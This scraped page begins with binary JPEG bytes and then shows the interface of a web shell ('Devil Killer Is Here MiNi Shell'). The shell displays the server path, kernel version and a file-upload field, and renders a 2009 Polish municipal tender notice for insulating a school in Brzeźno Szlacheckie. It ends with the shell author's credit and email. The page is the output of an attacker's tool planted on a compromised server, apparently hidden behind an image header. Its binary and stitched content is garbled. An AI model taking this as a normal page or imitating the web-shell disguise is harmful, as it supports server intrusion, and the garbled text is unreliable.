JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090519/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090519/77163-N-2009.html

<p class="kh_header"><b>Lipnica: Termomodernizacja budynku Zespołu Szkół w Brzeźnie Szlacheckim</b><br>
<b>Numer ogłoszenia: 77163 - 2009; data zamieszczenia: 19.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy , ul. Słomińskiego 19, 77-130 Lipnica, woj. pomorskie, tel. 059 8217080, faks 059 8218317.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.lipnica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Termomodernizacja budynku Zespołu Szkół w Brzeźnie Szlacheckim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie termomodernizacji  budynku Zespołu Szkół                 
    w Brzeźnie Szlacheckim  w szczególności w zakresie obejmującym:
   - ocieplenie ścian zewnętrznych - (część dydaktyczna)
   - wykończenie  elewacji części nowej szkoły (sala gimnastyczna)
 
    Szczegółowy opis przedmiotu zamówienia stanowią załączniki:
    1. dokumentacja techniczna wykonana przez Eko Projekt mgr inz. Wiesława Ulatowskiego,
    2. przedmiar robót, 
    3. specyfikacja  techniczna wykonania i odbioru robót,..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Zamawiający żąda od wykonawców  wniesienia wadium w kwocie 4.000,00 zł PLN        
      (słownie: cztery tysiące PLN)
  2. Wadium wnosi się przed upływem terminu składania ofert.
  3. Wadium może być wnoszone w jednej lub kilku następujących formach:
      a) pieniądzu,
       b) poręczeniach bankowych lub poręczeniach spółdzielczych kasy oszczędnościowo-
           kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
      c) gwarancjach bankowych,
      d) gwarancjach ubezpieczeniowych,
      e) poręczeniach udzielanych przez podmioty, których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 
          9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju przedsiębiorczości (Dz.U.
          Nr 109, poz. 1158 z óź. zm.)
  4. Wadium wpłacone w pieniądzu należy wpłacić przelewem na rachunek bankowy 
       Zamawiającego, numer rachunku bankowego: 09 9321 0001 0019 2516 2000  0030
        Wadium uważa się za wniesione, jeżeli kwota wadium znajdzie się na rachunku 
        Zamawiającego najpóźniej o godz. 9,00 dnia  10 czerwca 2009 r.
  5. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym
  6. Zamawiający zwraca niezwłocznie wadium, jeżeli:
       a). upłynął termin związania ofertą,
       b) zawarto umowę w sprawie zamówienia publicznego i wniesiono zabezpieczenie należytego 
           wykonania tej umowy.
      c) Zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty zostały 
          rozstrzygnięte lub upłynął termin do ich wnoszenia.
   7. Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy:
        a) który wycofał ofertę przed upływem terminu składania ofert,
        b) który został wykluczony z postępowania,
        c) którego oferta została odrzucona
    8. Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca  je wraz z odsetkami   
        wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, 
        pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej, za przelew 
       pieniędzy na rachunek bankowy wskazany przez wykonawcę.
       Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na 
       wezwanie, o których mowa w art. 26 ust3 ustawy nie złożył dokumentów lub oświadczeń,  o   
       których mowa w art. 25 ust. 1 ustawy lub pełnomocnictw, chyba, ze udowodni, ze wynika to z  
        przyczyn niezależnych po jego stronie.
    9. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została  
        wybrana:
       a) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych  
           w ofercie.
       b) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy.
       c) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn  
           leżących po stronie wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Zgodnie z art. 22 Ustawy, o udzielenie Zamówienia mogą ubiegać się Wykonawcy, którzy:                - posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli  
    ustawy nakładają obowiązek posiadania takich uprawnień;                                                                                   
 - posiadają niezbędną wiedzę i doświadczenie oraz potencjał techniczny, a także dysponują    
   osobami zdolnymi do wykonania Zamówienia;                                                                                        
 - znajdują się w sytuacji ekonomicznej i finansowej za?pewniającej wykonanie Zamówienia;                
 - nie podlegają wykluczeniu z postępowania, zgodnie z art. 24 Ustawy                                                
 - udzielą min. 3-letniej gwarancji  na wszystkie wykonane roboty, zamontowane elementy i 
    wbudowane  materiały..
 Ocena spełniania warunków  udziału w postępowaniu :                                                                        - ocena  wg formuły spełnia/ nie spełnia warunków udziału w postępowaniu..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. W celu potwierdzenia spełnienia warunków udziału w postępowaniu Wykonawcy zobowiązani są 
   dostarczyć w ofercie następujące oświadczenia i dokumenty: 
a) wypełniony formularz ofertowy - na załączonym wzorze stanowiącym zał. Nr  1
b) pisemne oświadczenie oferenta o spełnieniu wymogów art.22 ust.1 ustawy Pzp - na załączonym 
    wzorze   zał. Nr 2                         


c).kserokopię aktualnego odpisu z właściwego rejestru albo aktualne zaświadczenie o wpisie 
    do ewidencji  działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru 
    lub  zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż     
    6 miesięcy przed upływem terminu  składania   ofert.                                                                                                                                                                                                                                                              
d) kserokopię aktualnego zaświadczenia właściwego naczelnika Urzędu  Skarbowego że 
    wykonawca nie zalega z opłacaniem podatków , opłat lub zaświadczeń, że uzyskał przewidziane 
    prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w 
    całości wykonania decyzji właściwego organu   - wystawionego  nie wcześniej niż 3 miesiące 
    przed upływem terminu  składania ofert,
e) kserokopię aktualnego zaświadczenia właściwego oddziału Zakładu Ubezpieczeń   
    Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że  
    wykonawca nie zalega z opłacaniem opłat lub składek na ubezpieczenie zdrowotne lub społeczne 
    lub że uzyskał  przewidziane  prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych 
    płatności lub wstrzymania w całości  wykonania decyzji właściwego organu , wystawionego  nie 
    wcześniej niż 3 miesiące przed upływem terminu  składania ofert,                                                                               
 f) wykaz wykonanych w ciągu 5 lat , a jeżeli okres prowadzenia działalności jest krótszy- w tym 
    okresie ukończył z należytą starannością realizację co najmniej dwóch zadań obejmujących   
     zamówień porównywalnych z przedmiotem zamówienia, z podaniem ich wartości oraz 
    daty i miejsca  wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały 
     wykonane z należytą starannością - zał. nr 3 
      Warunek wymieniony p.pkt f) musi zostać spełniony łącznie przez wszystkich 
      Wykonawców  wspólnie ubiegających się o zamówienie.
  g) Wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia (której Wykonawca 
      powierzy funkcję kierownika budowy oraz kierowników robót) wraz z informacjami na temat ich 
      kwalifikacji zawodowych i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu 
     wykonywanych przez nich czynności (zgodnie z zał. nr 4 do SIWZ).
     -  Do wykazu należy dołączyć dokumenty potwierdzające uprawnienia tych osób (w formie decyzji,  
        aktualnego zaświadczenia o wpisie do właściwej Izby Inżynierów i Techników Budownictwa
  h) szczegółowy kosztorys ofertowy 
  i) polisa lub inny dokument ubezpieczenia potwierdzający, że wykonawca jest ubezpieczony od
    odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej.
  j) oświadczenie o udzielonej gwarancji  - zał. Nr 5
  k) dowód wniesienia wadium
2. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej zamiast dokumentów, o których mowa w  pkt  XI: 
 1.  składa dokumenty wystawione w kraju, w którym  ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)   nie otwarto jego likwidacji ani nie zgłoszono upadłości,
b)	nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne albo, że uzyskał przewidziane prawem zwolnienie , odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu. 
c)	nie orzeczono wobec niego zakazu ubiegania się o zamówienie,
2.1 dokumenty o których mowa w pkt 2 ppkt 1) lit a) i c)  powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokument o którym mowa w pkt. 2 ppkt 1) 
lit. b) powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
2.2 Jeżeli w kraju pochodzenia lub w którym Wykonawca ma siedzibę  lub miejsce zamieszkania, nie wydaje się wymienionych w pkt. 2 dokumentów zastępuje się je dokumentami zawierającymi oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiedniego kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Terminy o których mowa w pkt 2.1  stosuje się odpowiednio.  

3. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowaniu w postępowaniu i zawarcia umowy.
3.1 Oferty wspólne składane przez dwie lub więcej firm występujących jako partnerzy powinny spełniać następujące wymagania (Uwaga! Dotyczy to również spółek cywilnych):
a)	oferta wspólna powinna być sporządzona zgodnie z SIWZ oraz zawierać wszystkie wymagane oświadczenia i dokumenty wszystkich partnerów   (oraz w celu potwierdzenia reprezentacji o ile to nie wynika z innych dokumentów; umowę konsorcjum lub spółki cywilnej)
b)	oferta wraz z załącznikami powinna być podpisana przez pełnomocnika upoważnionego do reprezentacji Wykonawców,
c)	warunki i dokumenty wymagane przez Zamawiającego w SIWZ muszą być spełnione łącznie,  (dokumenty wymienione w  pkt XI partnerzy podpisują razem lub podpisuje je upoważniony pełnomocnik), 
d)	pełnomocnik pozostaje w kontakcie z Zamawiającym w toku postępowania, on zwraca się do Zamawiającego z wszelkimi sprawami i do niego Zamawiający kieruje informację, korespondencję itp.
3.2 Podmioty występujące wspólnie ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zobowiązań.  
 .
Wymagane dokumenty należy przedłożyć w formie oryginału lub kserokopii poświadczonej przez wykonawcę za zgodność z oryginałem.
      Z treści złożonych dokumentów musi wynikać jednoznacznie, iż Wykonawca spełnił warunki    
      wymienione w pkt  X
      UWAGA! Brak jakiegokolwiek z wyżej wymienionych dokumentów żądanych przez 
     zamawiającego, spowoduje wykluczenie Wykonawcy z postępowania z mocy art. 24 ust.2 pkt 3 
     - dokumenty   niespełniające wymogów, co do formy traktuje się jako nie złożenie wymaganych 
      dokumentów z zastrzeżeniem art. 26 ust.3 ustawy pzp..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.lipnica.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Lipnicy
ul. Słomińskiego 19, 77-130 Lipnica.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.06.2009 godzina 09:00, miejsce: Urząd Gminy w Lipnicy
ul. Słomińskiego 19, 77-130 Lipnica 
pok. Nr 10 - sala posiedzeń.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com